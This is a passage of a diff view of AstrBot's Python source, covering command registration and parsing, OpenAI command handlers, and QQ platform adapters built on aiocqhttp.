plugin_metadata: PluginMetadata
|
||||
handler: callable
|
||||
use_regex: bool = False
|
||||
ignore_prefix: bool = False
|
||||
description: str = ""
|
||||
|
||||
class CommandManager():
|
||||
def __init__(self):
|
||||
self.commands = []
|
||||
self.commands_handler: Dict[str, CommandMetadata] = {}
|
||||
self.command_parser = CommandParser()
|
||||
|
||||
def register(self,
|
||||
command: str,
|
||||
description: str,
|
||||
priority: int,
|
||||
handler: callable,
|
||||
use_regex: bool = False,
|
||||
ignore_prefix: bool = False,
|
||||
plugin_metadata: PluginMetadata = None,
|
||||
):
|
||||
'''
|
||||
优先级越高,越先被处理。
|
||||
|
||||
use_regex: 是否使用正则表达式匹配指令。
|
||||
'''
|
||||
if command in self.commands_handler:
|
||||
raise ValueError(f"Command {command} already exists.")
|
||||
if not handler:
|
||||
raise ValueError(f"Handler of {command} is None.")
|
||||
|
||||
heapq.heappush(self.commands, (-priority, command))
|
||||
self.commands_handler[command] = CommandMetadata(
|
||||
inner_command=plugin_metadata == None,
|
||||
plugin_metadata=plugin_metadata,
|
||||
handler=handler,
|
||||
use_regex=use_regex,
|
||||
ignore_prefix=ignore_prefix,
|
||||
description=description
|
||||
)
|
||||
if plugin_metadata:
|
||||
logger.info(f"已注册 {plugin_metadata.author}/{plugin_metadata.plugin_name} 的指令 {command}。")
|
||||
else:
|
||||
logger.info(f"已注册指令 {command}。")
|
||||
|
||||
def register_from_pcb(self, pcb: PluginCommandBridge):
|
||||
for request in pcb.plugin_commands_waitlist:
|
||||
plugin = None
|
||||
for registered_plugin in pcb.cached_plugins:
|
||||
if registered_plugin.metadata.plugin_name == request.plugin_name:
|
||||
plugin = registered_plugin
|
||||
break
|
||||
if not plugin:
|
||||
logger.warning(f"插件 {request.plugin_name} 未找到,无法注册指令 {request.command_name}。")
|
||||
else:
|
||||
self.register(command=request.command_name,
|
||||
description=request.description,
|
||||
priority=request.priority,
|
||||
handler=request.handler,
|
||||
use_regex=request.use_regex,
|
||||
ignore_prefix=request.ignore_prefix,
|
||||
plugin_metadata=plugin.metadata)
|
||||
self.plugin_commands_waitlist = []
|
||||
|
||||
async def check_command_ignore_prefix(self, message_str: str) -> bool:
|
||||
for _, command in self.commands:
|
||||
command_metadata = self.commands_handler[command]
|
||||
if command_metadata.ignore_prefix:
|
||||
trig = False
|
||||
if self.commands_handler[command].use_regex:
|
||||
trig = self.command_parser.regex_match(message_str, command)
|
||||
else:
|
||||
trig = message_str.startswith(command)
|
||||
if trig:
|
||||
return True
|
||||
return False
|
||||
|
||||
async def scan_command(self, message_event: AstrMessageEvent, context: Context) -> CommandResult:
|
||||
message_str = message_event.message_str
|
||||
for _, command in self.commands:
|
||||
trig = False
|
||||
if self.commands_handler[command].use_regex:
|
||||
trig = self.command_parser.regex_match(message_str, command)
|
||||
else:
|
||||
trig = message_str.startswith(command)
|
||||
if trig:
|
||||
logger.info(f"触发 {command} 指令。")
|
||||
command_result = await self.execute_handler(command, message_event, context)
|
||||
if not command_result:
|
||||
continue
|
||||
if command_result.hit:
|
||||
return command_result
|
||||
|
||||
async def execute_handler(self,
|
||||
command: str,
|
||||
message_event: AstrMessageEvent,
|
||||
context: Context) -> CommandResult:
|
||||
command_metadata = self.commands_handler[command]
|
||||
handler = command_metadata.handler
|
||||
# call handler
|
||||
try:
|
||||
if inspect.iscoroutinefunction(handler):
|
||||
command_result = await handler(message_event, context)
|
||||
else:
|
||||
command_result = handler(message_event, context)
|
||||
|
||||
# if not isinstance(command_result, CommandResult):
|
||||
# raise ValueError(f"Command {command} handler should return CommandResult.")
|
||||
|
||||
if not command_result:
|
||||
return
|
||||
|
||||
context.metrics_uploader.command_stats[command] += 1
|
||||
|
||||
return command_result
|
||||
except BaseException as e:
|
||||
logger.error(traceback.format_exc())
|
||||
|
||||
if not command_metadata.inner_command:
|
||||
text = f"执行 {command}/({command_metadata.plugin_metadata.plugin_name} By {command_metadata.plugin_metadata.author}) 指令时发生了异常。{e}"
|
||||
logger.error(text)
|
||||
else:
|
||||
text = f"执行 {command} 指令时发生了异常。{e}"
|
||||
logger.error(text)
|
||||
return CommandResult().message(text)
|
||||
186
model/command/openai_official_handler.py
Normal file
@@ -0,0 +1,186 @@
|
||||
from model.command.manager import CommandManager
|
||||
from type.message_event import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
from type.types import Context
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from nakuru.entities.components import Image
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial, MODELS
|
||||
from util.personality import personalities
|
||||
from util.io import download_image_by_url
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class OpenAIOfficialCommandHandler():
|
||||
def __init__(self, manager: CommandManager) -> None:
|
||||
self.manager = manager
|
||||
|
||||
self.provider = None
|
||||
|
||||
self.manager.register("reset", "重置会话", 10, self.reset)
|
||||
self.manager.register("his", "查看历史记录", 10, self.his)
|
||||
self.manager.register("status", "查看当前状态", 10, self.status)
|
||||
self.manager.register("switch", "切换账号", 10, self.switch)
|
||||
self.manager.register("unset", "清除个性化人格设置", 10, self.unset)
|
||||
self.manager.register("set", "设置个性化人格", 10, self.set)
|
||||
self.manager.register("draw", "调用 DallE 模型画图", 10, self.draw)
|
||||
self.manager.register("model", "切换模型", 10, self.model)
|
||||
self.manager.register("画", "调用 DallE 模型画图", 10, self.draw)
|
||||
|
||||
def set_provider(self, provider):
|
||||
self.provider = provider
|
||||
|
||||
async def reset(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
await self.provider.forget(message.session_id, keep_system_prompt=True)
|
||||
return CommandResult().message("重置成功")
|
||||
elif tokens.get(1) == 'p':
|
||||
await self.provider.forget(message.session_id)
|
||||
|
||||
async def model(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
ret = await self._print_models()
|
||||
return CommandResult().message(ret)
|
||||
model = tokens.get(1)
|
||||
if model.isdigit():
|
||||
try:
|
||||
models = await self.provider.get_models()
|
||||
except BaseException as e:
|
||||
logger.error(f"获取模型列表失败: {str(e)}")
|
||||
return CommandResult().message("获取模型列表失败,无法使用编号切换模型。可以尝试直接输入模型名来切换,如 gpt-4o。")
|
||||
models = list(models)
|
||||
if int(model) <= len(models) and int(model) >= 1:
|
||||
model = models[int(model)-1]
|
||||
self.provider.set_model(model.id)
|
||||
return CommandResult().message(f"模型已设置为 {model.id}")
|
||||
else:
|
||||
self.provider.set_model(model)
|
||||
return CommandResult().message(f"模型已设置为 {model} (自定义)")
|
||||
|
||||
async def _print_models(self):
|
||||
try:
|
||||
models = await self.provider.get_models()
|
||||
except BaseException as e:
|
||||
return "获取模型列表失败: " + str(e)
|
||||
i = 1
|
||||
ret = "OpenAI GPT 类可用模型"
|
||||
for model in models:
|
||||
ret += f"\n{i}. {model.id}"
|
||||
i += 1
|
||||
ret += "\nTips: 使用 /model 模型名/编号,即可实时更换模型。如目标模型不存在于上表,请输入模型名。"
|
||||
logger.debug(ret)
|
||||
return ret
|
||||
|
||||
def his(self, message: AstrMessageEvent, context: Context):
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
if tokens.len == 2:
|
||||
try:
|
||||
page = int(tokens.get(1))
|
||||
except BaseException as e:
|
||||
return CommandResult().message("页码格式错误")
|
||||
contexts, total_num = self.provider.dump_contexts_page(message.session_id, size_per_page, page=page)
|
||||
t_pages = total_num // size_per_page + 1
|
||||
return CommandResult().message(f"历史记录如下:\n{contexts}\n第 {page} 页 | 共 {t_pages} 页\n*输入 /his 2 跳转到第 2 页")
|
||||
|
||||
def status(self, message: AstrMessageEvent, context: Context):
|
||||
keys_data = self.provider.get_keys_data()
|
||||
ret = "OpenAI Key"
|
||||
for k in keys_data:
|
||||
status = "🟢" if keys_data[k] else "🔴"
|
||||
ret += "\n|- " + k[:8] + " " + status
|
||||
|
||||
conf = self.provider.get_configs()
|
||||
ret += "\n当前模型: " + conf['model']
|
||||
if conf['model'] in MODELS:
|
||||
ret += "\n最大上下文窗口: " + str(MODELS[conf['model']]) + " tokens"
|
||||
|
||||
if message.session_id in self.provider.session_memory and len(self.provider.session_memory[message.session_id]):
|
||||
ret += "\n你的会话上下文: " + str(self.provider.session_memory[message.session_id][-1]['usage_tokens']) + " tokens"
|
||||
|
||||
return CommandResult().message(ret)
|
||||
|
||||
async def switch(self, message: AstrMessageEvent, context: Context):
|
||||
'''
|
||||
切换账号
|
||||
'''
|
||||
tokens = self.manager.command_parser.parse(message.message_str)
|
||||
if tokens.len == 1:
|
||||
_, ret, _ = self.status()
|
||||
curr_ = self.provider.get_curr_key()
|
||||
if curr_ is None:
|
||||
ret += "当前您未选择账号。输入/switch <账号序号>切换账号。"
|
||||
else:
|
||||
ret += f"当前您选择的账号为:{curr_[-8:]}。输入/switch <账号序号>切换账号。"
|
||||
return CommandResult().message(ret)
|
||||
elif tokens.len == 2:
|
||||
try:
|
||||
key_stat = self.provider.get_keys_data()
|
||||
index = int(tokens.get(1))
|
||||
if index > len(key_stat) or index < 1:
|
||||
return CommandResult().message("账号序号错误。")
|
||||
else:
|
||||
try:
|
||||
new_key = list(key_stat.keys())[index-1]
|
||||
self.provider.set_key(new_key)
|
||||
except BaseException as e:
|
||||
return CommandResult().message("切换账号未知错误: "+str(e))
|
||||
return CommandResult().message("切换账号成功。")
|
||||
except BaseException as e:
|
||||
return CommandResult().message("切换账号错误。")
|
||||
else:
|
||||
return CommandResult().message("参数过多。")
|
||||
|
||||
def unset(self, message: AstrMessageEvent, context: Context):
|
||||
self.provider.curr_personality = {}
|
||||
self.provider.forget(message.session_id)
|
||||
return CommandResult().message("已清除个性化设置。")
|
||||
|
||||
|
||||
def set(self, message: AstrMessageEvent, context: Context):
|
||||
l = message.message_str.split(" ")
|
||||
if len(l) == 1:
|
||||
return CommandResult().message("- 设置人格: \nset 人格名。例如 set 编剧\n- 人格列表: set list\n- 人格详细信息: set view 人格名\n- 自定义人格: set 人格文本\n- 重置会话(清除人格): reset\n- 重置会话(保留人格): reset p\n\n【当前人格】: " + str(self.provider.curr_personality['prompt']))
|
||||
elif l[1] == "list":
|
||||
msg = "人格列表:\n"
|
||||
for key in personalities.keys():
|
||||
msg += f"- {key}\n"
|
||||
msg += '\n\n*输入 set view 人格名 查看人格详细信息'
|
||||
return CommandResult().message(msg)
|
||||
elif l[1] == "view":
|
||||
if len(l) == 2:
|
||||
return CommandResult().message("请输入人格名")
|
||||
ps = l[2].strip()
|
||||
if ps in personalities:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{personalities[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
return CommandResult().message(msg)
|
||||
else:
|
||||
ps = "".join(l[1:]).strip()
|
||||
if ps in personalities:
|
||||
self.provider.curr_personality = {
|
||||
'name': ps,
|
||||
'prompt': personalities[ps]
|
||||
}
|
||||
self.provider.personality_set(self.provider.curr_personality, message.session_id)
|
||||
return CommandResult().message(f"人格已设置。 \n人格信息: {ps}")
|
||||
else:
|
||||
self.provider.curr_personality = {
|
||||
'name': '自定义人格',
|
||||
'prompt': ps
|
||||
}
|
||||
self.provider.personality_set(self.provider.curr_personality, message.session_id)
|
||||
return CommandResult().message(f"人格已设置。 \n人格信息: {ps}")
|
||||
|
||||
async def draw(self, message: AstrMessageEvent, context: Context):
|
||||
message = message.message_str.removeprefix("画")
|
||||
img_url = await self.provider.image_generate(message)
|
||||
return CommandResult(
|
||||
message_chain=[Image.fromURL(img_url)],
|
||||
)
|
||||
25
model/command/parser.py
Normal file
@@ -0,0 +1,25 @@
|
||||
import re
|
||||
|
||||
class CommandTokens():
|
||||
def __init__(self) -> None:
|
||||
self.tokens = []
|
||||
self.len = 0
|
||||
|
||||
def get(self, idx: int):
|
||||
if idx >= self.len:
|
||||
return None
|
||||
return self.tokens[idx].strip()
|
||||
|
||||
class CommandParser():
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
def parse(self, message: str):
|
||||
cmd_tokens = CommandTokens()
|
||||
cmd_tokens.tokens = message.split(" ")
|
||||
cmd_tokens.len = len(cmd_tokens.tokens)
|
||||
return cmd_tokens
|
||||
|
||||
def regex_match(self, message: str, command: str) -> bool:
|
||||
return re.search(command, message, re.MULTILINE) is not None
|
||||
|
||||
86
model/platform/__init__.py
Normal file
@@ -0,0 +1,86 @@
|
||||
import abc
|
||||
from typing import Union, Any, List
|
||||
from nakuru.entities.components import Plain, At, Image, BaseMessageComponent
|
||||
from type.astrbot_message import AstrBotMessage
|
||||
from type.command import CommandResult
|
||||
from type.astrbot_message import MessageType
|
||||
|
||||
|
||||
class Platform():
|
||||
def __init__(self, platform_name: str, context) -> None:
|
||||
self.PLATFORM_NAME = platform_name
|
||||
self.context = context
|
||||
|
||||
@abc.abstractmethod
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
'''
|
||||
处理到来的消息
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def reply_msg(self, message: AstrBotMessage,
|
||||
result_message: List[BaseMessageComponent]):
|
||||
'''
|
||||
回复用户唤醒机器人的消息。(被动回复)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send_msg(self, target: Any, result_message: CommandResult):
|
||||
'''
|
||||
发送消息(主动)
|
||||
'''
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
'''
|
||||
发送消息(主动)
|
||||
'''
|
||||
pass
|
||||
|
||||
def parse_message_outline(self, message: AstrBotMessage) -> str:
|
||||
'''
|
||||
将消息解析成大纲消息形式,如: xxxxx[图片]xxxxx。用于输出日志等。
|
||||
'''
|
||||
if isinstance(message, str):
|
||||
return message
|
||||
ret = ''
|
||||
parsed = message if isinstance(message, list) else message.message
|
||||
try:
|
||||
for node in parsed:
|
||||
if isinstance(node, Plain):
|
||||
ret += node.text.replace('\n', ' ')
|
||||
elif isinstance(node, At):
|
||||
ret += f'[At: {node.name}/{node.qq}]'
|
||||
elif isinstance(node, Image):
|
||||
ret += '[图片]'
|
||||
except Exception as e:
|
||||
pass
|
||||
return ret[:100] if len(ret) > 100 else ret
|
||||
|
||||
def check_nick(self, message_str: str) -> bool:
|
||||
w = self.context.config_helper.wake_prefix
|
||||
if not w: return False
|
||||
for nick in w:
|
||||
if nick and message_str.strip().startswith(nick):
|
||||
return True
|
||||
return False
|
||||
|
||||
async def convert_to_t2i_chain(self, message_result: list) -> list:
|
||||
plain_str = ""
|
||||
rendered_images = []
|
||||
for i in message_result:
|
||||
if isinstance(i, Plain):
|
||||
plain_str += i.text
|
||||
if plain_str and len(plain_str) > 50:
|
||||
p = await self.context.image_renderer.render(plain_str, return_url=True)
|
||||
if p.startswith('http'):
|
||||
rendered_images.append(Image.fromURL(p))
|
||||
else:
|
||||
rendered_images.append(Image.fromFileSystem(p))
|
||||
return rendered_images
|
||||
|
||||
async def record_metrics(self):
|
||||
self.context.metrics_uploader.increment_platform_stat(self.PLATFORM_NAME)
|
||||
97
model/platform/manager.py
Normal file
@@ -0,0 +1,97 @@
|
||||
import asyncio
|
||||
|
||||
from util.io import port_checker
|
||||
from type.register import RegisteredPlatform
|
||||
from type.types import Context
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import (
|
||||
PlatformConfig,
|
||||
AiocqhttpPlatformConfig,
|
||||
NakuruPlatformConfig,
|
||||
QQOfficialPlatformConfig
|
||||
)
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
class PlatformManager():
|
||||
def __init__(self, context: Context, message_handler: MessageHandler) -> None:
|
||||
self.context = context
|
||||
self.msg_handler = message_handler
|
||||
|
||||
def load_platforms(self):
|
||||
tasks = []
|
||||
|
||||
platforms = self.context.config_helper.platform
|
||||
logger.info(f"加载 {len(platforms)} 个机器人消息平台...")
|
||||
for platform in platforms:
|
||||
if not platform.enable:
|
||||
continue
|
||||
if platform.name == "qq_official":
|
||||
assert isinstance(platform, QQOfficialPlatformConfig), "qq_official: 无法识别的配置类型。"
|
||||
logger.info(f"加载 QQ官方 机器人消息平台 (appid: {platform.appid})")
|
||||
tasks.append(asyncio.create_task(self.qqofficial_bot(platform), name="qqofficial-adapter"))
|
||||
elif platform.name == "nakuru":
|
||||
assert isinstance(platform, NakuruPlatformConfig), "nakuru: 无法识别的配置类型。"
|
||||
logger.info(f"加载 QQ(nakuru) 机器人消息平台 ({platform.host}, {platform.websocket_port}, {platform.port})")
|
||||
tasks.append(asyncio.create_task(self.nakuru_bot(platform), name="nakuru-adapter"))
|
||||
elif platform.name == "aiocqhttp":
|
||||
assert isinstance(platform, AiocqhttpPlatformConfig), "aiocqhttp: 无法识别的配置类型。"
|
||||
logger.info("加载 QQ(aiocqhttp) 机器人消息平台")
|
||||
tasks.append(asyncio.create_task(self.aiocq_bot(platform), name="aiocqhttp-adapter"))
|
||||
|
||||
return tasks
|
||||
|
||||
async def nakuru_bot(self, config: NakuruPlatformConfig):
|
||||
'''
|
||||
运行 QQ(nakuru 适配器)
|
||||
'''
|
||||
from model.platform.qq_nakuru import QQNakuru
|
||||
noticed = False
|
||||
host = config.host
|
||||
port = config.websocket_port
|
||||
http_port = config.port
|
||||
logger.info(
|
||||
f"正在检查连接...host: {host}, ws port: {port}, http port: {http_port}")
|
||||
while True:
|
||||
if not port_checker(port=port, host=host) or not port_checker(port=http_port, host=host):
|
||||
if not noticed:
|
||||
noticed = True
|
||||
logger.warning(
|
||||
f"连接到{host}:{port}(或{http_port})失败。程序会每隔 5s 自动重试。")
|
||||
await asyncio.sleep(5)
|
||||
else:
|
||||
logger.info("nakuru 适配器已连接。")
|
||||
break
|
||||
try:
|
||||
qq_gocq = QQNakuru(self.context, self.msg_handler, config)
|
||||
self.context.platforms.append(RegisteredPlatform(
|
||||
platform_name="nakuru", platform_instance=qq_gocq, origin="internal"))
|
||||
await qq_gocq.run()
|
||||
except BaseException as e:
|
||||
logger.error("启动 nakuru 适配器时出现错误: " + str(e))
|
||||
|
||||
def aiocq_bot(self, config):
|
||||
'''
|
||||
运行 QQ(aiocqhttp 适配器)
|
||||
'''
|
||||
from model.platform.qq_aiocqhttp import AIOCQHTTP
|
||||
qq_aiocqhttp = AIOCQHTTP(self.context, self.msg_handler, config)
|
||||
self.context.platforms.append(RegisteredPlatform(
|
||||
platform_name="aiocqhttp", platform_instance=qq_aiocqhttp, origin="internal"))
|
||||
return qq_aiocqhttp.run_aiocqhttp()
|
||||
|
||||
def qqofficial_bot(self, config):
|
||||
'''
|
||||
运行 QQ 官方机器人适配器
|
||||
'''
|
||||
try:
|
||||
from model.platform.qq_official import QQOfficial
|
||||
qqchannel_bot = QQOfficial(self.context, self.msg_handler, config)
|
||||
self.context.platforms.append(RegisteredPlatform(
|
||||
platform_name="qqofficial", platform_instance=qqchannel_bot, origin="internal"))
|
||||
return qqchannel_bot.run()
|
||||
except BaseException as e:
|
||||
logger.error("启动 QQ官方机器人适配器时出现错误: " + str(e))
|
||||
279
model/platform/qq_aiocqhttp.py
Normal file
@@ -0,0 +1,279 @@
|
||||
import time
|
||||
import asyncio
|
||||
import traceback
|
||||
import logging
|
||||
from aiocqhttp import CQHttp, Event
|
||||
from aiocqhttp.exceptions import ActionFailed
|
||||
from . import Platform
|
||||
from type.astrbot_message import *
|
||||
from type.message_event import *
|
||||
from type.command import *
|
||||
from typing import Union, List, Dict
|
||||
from nakuru.entities.components import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import PlatformConfig, AiocqhttpPlatformConfig
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
class AIOCQHTTP(Platform):
|
||||
def __init__(self, context: Context,
|
||||
message_handler: MessageHandler,
|
||||
platform_config: PlatformConfig) -> None:
|
||||
super().__init__("aiocqhttp", context)
|
||||
assert isinstance(platform_config, AiocqhttpPlatformConfig), "aiocqhttp: 无法识别的配置类型。"
|
||||
|
||||
self.message_handler = message_handler
|
||||
self.waiting = {}
|
||||
self.context = context
|
||||
self.config = platform_config
|
||||
self.unique_session = context.config_helper.platform_settings.unique_session
|
||||
self.host = platform_config.ws_reverse_host
|
||||
self.port = platform_config.ws_reverse_port
|
||||
self.admins = context.config_helper.admins_id
|
||||
|
||||
def convert_message(self, event: Event) -> AstrBotMessage:
|
||||
|
||||
abm = AstrBotMessage()
|
||||
abm.self_id = str(event.self_id)
|
||||
abm.tag = "aiocqhttp"
|
||||
|
||||
abm.sender = MessageMember(str(event.sender['user_id']), event.sender['nickname'])
|
||||
|
||||
if event['message_type'] == 'group':
|
||||
abm.type = MessageType.GROUP_MESSAGE
|
||||
elif event['message_type'] == 'private':
|
||||
abm.type = MessageType.FRIEND_MESSAGE
|
||||
|
||||
if self.unique_session:
|
||||
abm.session_id = abm.sender.user_id
|
||||
else:
|
||||
abm.session_id = str(event.group_id) if abm.type == MessageType.GROUP_MESSAGE else abm.sender.user_id
|
||||
|
||||
abm.message_id = str(event.message_id)
|
||||
abm.message = []
|
||||
|
||||
message_str = ""
|
||||
if not isinstance(event.message, list):
|
||||
err = f"aiocqhttp: 无法识别的消息类型: {str(event.message)},此条消息将被忽略。如果您在使用 go-cqhttp,请将其配置文件中的 message.post-format 更改为 array。"
|
||||
logger.critical(err)
|
||||
try:
|
||||
self.bot.send(event, err)
|
||||
except BaseException as e:
|
||||
logger.error(f"回复消息失败: {e}")
|
||||
return
|
||||
for m in event.message:
|
||||
t = m['type']
|
||||
a = None
|
||||
if t == 'at':
|
||||
a = At(**m['data'])
|
||||
abm.message.append(a)
|
||||
if t == 'text':
|
||||
a = Plain(text=m['data']['text'])
|
||||
message_str += m['data']['text'].strip()
|
||||
abm.message.append(a)
|
||||
if t == 'image':
|
||||
file = m['data']['file'] if 'file' in m['data'] else None
|
||||
url = m['data']['url'] if 'url' in m['data'] else None
|
||||
a = Image(file=file, url=url)
|
||||
abm.message.append(a)
|
||||
abm.timestamp = int(time.time())
|
||||
abm.message_str = message_str
|
||||
abm.raw_message = event
|
||||
return abm
|
||||
|
||||
def run_aiocqhttp(self):
|
||||
if not self.host or not self.port:
|
||||
return
|
||||
self.bot = CQHttp(use_ws_reverse=True, import_name='aiocqhttp', api_timeout_sec=180)
|
||||
@self.bot.on_message('group')
|
||||
async def group(event: Event):
|
||||
abm = self.convert_message(event)
|
||||
if abm:
|
||||
await self.handle_msg(abm)
|
||||
|
||||
@self.bot.on_message('private')
|
||||
async def private(event: Event):
|
||||
abm = self.convert_message(event)
|
||||
if abm:
|
||||
await self.handle_msg(abm)
|
||||
|
||||
bot = self.bot.run_task(host=self.host, port=int(self.port), shutdown_trigger=self.shutdown_trigger_placeholder)
|
||||
|
||||
for handler in logging.root.handlers[:]:
|
||||
logging.root.removeHandler(handler)
|
||||
logging.getLogger('aiocqhttp').setLevel(logging.ERROR)
|
||||
|
||||
return bot
|
||||
|
||||
async def shutdown_trigger_placeholder(self):
|
||||
while self.context.running:
|
||||
await asyncio.sleep(1)
|
||||
|
||||
async def pre_check(self, message: AstrBotMessage) -> bool:
|
||||
# if message chain contains Plain components or
|
||||
# At components which points to self_id, return True
|
||||
if message.type == MessageType.FRIEND_MESSAGE:
|
||||
return True, "friend"
|
||||
for comp in message.message:
|
||||
if isinstance(comp, At) and str(comp.qq) == message.self_id:
|
||||
return True, "at"
|
||||
# check commands which ignore prefix
|
||||
if await self.context.command_manager.check_command_ignore_prefix(message.message_str):
|
||||
return True, "command"
|
||||
# check nicks
|
||||
if self.check_nick(message.message_str):
|
||||
return True, "nick"
|
||||
return False, "none"
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.nickname}/{message.sender.user_id} -> {self.parse_message_outline(message)}")
|
||||
|
||||
ok, reason = await self.pre_check(message)
|
||||
if not ok:
|
||||
return
|
||||
|
||||
# 解析 role
|
||||
sender_id = str(message.sender.user_id)
|
||||
if sender_id in self.admins:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
# parse unified message origin
|
||||
unified_msg_origin = None
|
||||
assert isinstance(message.raw_message, Event)
|
||||
if message.type == MessageType.GROUP_MESSAGE:
|
||||
unified_msg_origin = f"aiocqhttp:{message.type.value}:{message.raw_message.group_id}"
|
||||
elif message.type == MessageType.FRIEND_MESSAGE:
|
||||
unified_msg_origin = f"aiocqhttp:{message.type.value}:{message.sender.user_id}"
|
||||
|
||||
logger.debug(f"unified_msg_origin: {unified_msg_origin}")
|
||||
|
||||
# construct astrbot message event
|
||||
ame = AstrMessageEvent.from_astrbot_message(message,
|
||||
self.context,
|
||||
"aiocqhttp",
|
||||
message.session_id,
|
||||
role,
|
||||
unified_msg_origin,
|
||||
reason == "command") # only_command
|
||||
|
||||
# transfer control to message handler
|
||||
message_result = await self.message_handler.handle(ame)
|
||||
if not message_result: return
|
||||
|
||||
await self.reply_msg(message, message_result.result_message, message_result.use_t2i)
|
||||
if message_result.callback:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if message.session_id in self.waiting and self.waiting[message.session_id] == '':
|
||||
self.waiting[message.session_id] = message
|
||||
|
||||
return message_result
|
||||
|
||||
|
||||
async def reply_msg(self,
|
||||
message: AstrBotMessage,
|
||||
result_message: list,
|
||||
use_t2i: bool = None):
|
||||
"""
|
||||
回复用户唤醒机器人的消息。(被动回复)
|
||||
"""
|
||||
res = result_message
|
||||
|
||||
if isinstance(res, str):
|
||||
res = [Plain(text=res), ]
|
||||
|
||||
# if image mode, put all Plain texts into a new picture.
|
||||
if (use_t2i or (use_t2i == None and self.context.config_helper.t2i)) and isinstance(result_message, list):
|
||||
rendered_images = await self.convert_to_t2i_chain(res)
|
||||
if rendered_images:
|
||||
try:
|
||||
await self._reply(message, rendered_images)
|
||||
return rendered_images
|
||||
except BaseException as e:
|
||||
logger.warn(traceback.format_exc())
|
||||
logger.warn(f"以文本转图片的形式回复消息时发生错误: {e},将尝试默认方式。")
|
||||
|
||||
await self._reply(message, res)
|
||||
return res
|
||||
|
||||
async def _reply(self, message: Union[AstrBotMessage, Dict], message_chain: List[BaseMessageComponent]):
|
||||
await self.record_metrics()
|
||||
if isinstance(message_chain, str):
|
||||
message_chain = [Plain(text=message_chain), ]
|
||||
|
||||
if isinstance(message, AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.user_id} <- {self.parse_message_outline(message)}")
|
||||
else:
|
||||
logger.info(f"回复消息: {message_chain}")
|
||||
|
||||
ret = []
|
||||
image_idx = []
|
||||
for idx, segment in enumerate(message_chain):
|
||||
d = segment.toDict()
|
||||
if isinstance(segment, Plain):
|
||||
d['type'] = 'text'
|
||||
if isinstance(segment, Image):
|
||||
image_idx.append(idx)
|
||||
ret.append(d)
|
||||
if os.environ.get('TEST_MODE', 'off') == 'on':
|
||||
logger.info(f"回复消息: {ret}")
|
||||
return
|
||||
try:
|
||||
await self._reply_wrapper(message, ret)
|
||||
except ActionFailed as e:
|
||||
if e.retcode == 1200:
|
||||
# ENOENT
|
||||
if not image_idx:
|
||||
raise e
|
||||
logger.warn("回复失败。检测到失败原因为文件未找到,猜测用户的协议端与 AstrBot 位于不同的文件系统上。尝试采用上传图片的方式发图。")
|
||||
for idx in image_idx:
|
||||
if ret[idx]['data']['file'].startswith('file://'):
|
||||
logger.info(f"正在上传图片: {ret[idx]['data']['path']}")
|
||||
image_url = await self.context.image_uploader.upload_image(ret[idx]['data']['path'])
|
||||
logger.info(f"上传成功。")
|
||||
ret[idx]['data']['file'] = image_url
|
||||
ret[idx]['data']['path'] = image_url
|
||||
await self._reply_wrapper(message, ret)
|
||||
else:
|
||||
logger.error(traceback.format_exc())
|
||||
logger.error(f"回复消息失败: {e}")
|
||||
raise e
|
||||
|
||||
async def _reply_wrapper(self, message: Union[AstrBotMessage, Dict], ret: List):
|
||||
if isinstance(message, AstrBotMessage):
|
||||
await self.bot.send(message.raw_message, ret)
|
||||
if isinstance(message, dict):
|
||||
if 'group_id' in message:
|
||||
await self.bot.send_group_msg(group_id=message['group_id'], message=ret)
|
||||
elif 'user_id' in message:
|
||||
await self.bot.send_private_msg(user_id=message['user_id'], message=ret)
|
||||
else:
|
||||
raise Exception("aiocqhttp: 无法识别的消息来源。仅支持 group_id 和 user_id。")
|
||||
|
||||
async def send_msg(self, target: Dict[str, int], result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给QQ用户、QQ群发送一条消息。
|
||||
|
||||
`target` 接收一个 dict 类型的值引用。
|
||||
|
||||
- 要发给 QQ 下的某个用户,请添加 key `user_id`,值为 int 类型的 qq 号;
|
||||
- 要发给某个群聊,请添加 key `group_id`,值为 int 类型的 qq 群号;
|
||||
|
||||
'''
|
||||
|
||||
await self._reply(target, result_message.message_chain)
|
||||
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
if message_type == MessageType.GROUP_MESSAGE:
|
||||
await self.send_msg({'group_id': int(target)}, result_message)
|
||||
elif message_type == MessageType.FRIEND_MESSAGE:
|
||||
await self.send_msg({'user_id': int(target)}, result_message)
|
||||
else:
|
||||
raise Exception("aiocqhttp: 无法识别的消息类型。")
|
||||
310
model/platform/qq_nakuru.py
Normal file
